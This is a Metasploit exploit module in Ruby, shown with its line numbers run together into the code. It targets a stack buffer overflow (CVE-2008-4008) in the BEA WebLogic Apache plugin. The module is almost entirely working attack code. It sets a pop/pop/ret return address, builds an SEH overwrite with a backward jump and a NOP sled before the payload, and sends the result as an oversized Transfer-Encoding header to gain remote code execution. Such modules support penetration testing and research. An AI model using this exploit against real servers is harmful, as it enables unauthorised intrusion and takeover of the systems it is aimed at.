Path: blob/master/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
19758 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78HttpFingerprint = { :pattern => [ /Apache/ ] }910include Msf::Exploit::Remote::HttpClient11include Msf::Exploit::Remote::Seh1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow',18'Description' => %q{19This module exploits a stack based buffer overflow in the BEA20Weblogic Apache plugin. This vulnerability exists in the21error reporting for unknown Transfer-Encoding headers.22You may have to run this twice due to timing issues with handlers.23},24'Author' => 'pusscat',25'References' => [26[ 'CVE', '2008-4008' ],27[ 'OSVDB', '49283' ]28],29'DefaultOptions' => {30'EXITFUNC' => 'seh',31},32'Privileged' => true,33'Platform' => 'win',34'Payload' => {35'Space' => 500,36'BadChars' => "\x00\x0d\x0a",37'StackAdjustment' => -1500,38},39'Targets' => [40[41'Windows Apache 2.2 version Universal',42{43'Ret' => 0x1001f4d6, # pop/pop/ret44}45],46],47'DisclosureDate' => '2008-09-09',48'DefaultTarget' => 0,49'Notes' => {50'Reliability' => UNKNOWN_RELIABILITY,51'Stability' => UNKNOWN_STABILITY,52'SideEffects' => UNKNOWN_SIDE_EFFECTS53}54)55)56end5758def exploit59sploit = rand_text_alphanumeric(5800)60sploit[5781, 8] = generate_seh_record(target.ret)61# Jump backward to the payload62sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff"63sploit[0, payload.encoded.length + 7] = make_nops(7) + payload.encoded6465datastore['VHOST'] = 'localhost'66send_request_cgi(67{68'method' => 'POST',69'url' => '/index.jsp',70'data' => '',71'headers' =>72{73'Transfer-Encoding' => sploit74}75}76)7778handler79end80end818283